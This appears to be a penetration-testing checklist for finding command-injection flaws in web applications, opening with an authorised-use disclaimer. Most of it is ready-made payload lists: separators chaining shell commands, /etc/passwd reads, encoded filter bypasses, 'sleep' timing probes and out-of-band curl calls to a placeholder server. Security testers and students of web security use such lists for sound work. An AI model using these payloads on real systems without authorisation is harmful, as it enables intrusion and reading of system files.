Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity

  1. Initial Information Gathering

    • Identify and map all endpoints that accept user input which could be used to execute system commands.
    • Review source code (if available) to understand how user inputs are handled.
    • Check for user inputs in URLs, form fields, headers, and request bodies that interact with the operating system.

  2. Basic Command Injection Testing

    1. Test with simple command injection payloads to identify vulnerabilities:
      • ; ls
      • | ls
      • && ls
      • || ls
      • $(ls)

  3. Advanced Command Injection Techniques

    1. Test for bypassing input validation and filtering:
      • ; cat /etc/passwd
      • | cat /etc/passwd
      • && cat /etc/passwd
      • || cat /etc/passwd
      • $(cat /etc/passwd)
    2. Use encoding to bypass filters:
      • URL encoding: %3B%20ls
      • Double URL encoding: %253B%2520ls
      • Base64 encoding: Y2F0IC9ldGMvcGFzc3dk
    3. Test for time delay to identify blind command injection:
      • ; sleep 10
      • | sleep 10
      • && sleep 10
      • || sleep 10
      • $(sleep 10)

  4. Out-of-Band (OOB) Command Injection

    1. Set up an OOB endpoint to detect blind command injection:
      • ; curl http://[YOUR_SERVER]/ping
      • | curl http://[YOUR_SERVER]/ping
      • && curl http://[YOUR_SERVER]/ping
      • || curl http://[YOUR_SERVER]/ping
      • $(curl http://[YOUR_SERVER]/ping)
      • \curl http://[YOUR_SERVER]/ping

  5. Command Injection in Different Contexts

    1. Test command injection in file paths:
      • /path/to/file; ls
      • /path/to/file| ls
      • /path/to/file&& ls
    2. Test command injection in environment variables:
      • ENV_VAR="value; ls"
      • ENV_VAR="value| ls"
      • ENV_VAR="value&& ls"
    3. Test command injection in configuration files:
      • config_option=value; ls
      • config_option=value| ls
      • config_option=value&& ls

  6. Error Handling and Response Analysis

    • Analyze server responses for clues about command injection vulnerabilities.
    • Look for error messages that disclose command execution results or system information.
    • Verify if application stack traces are exposed in responses.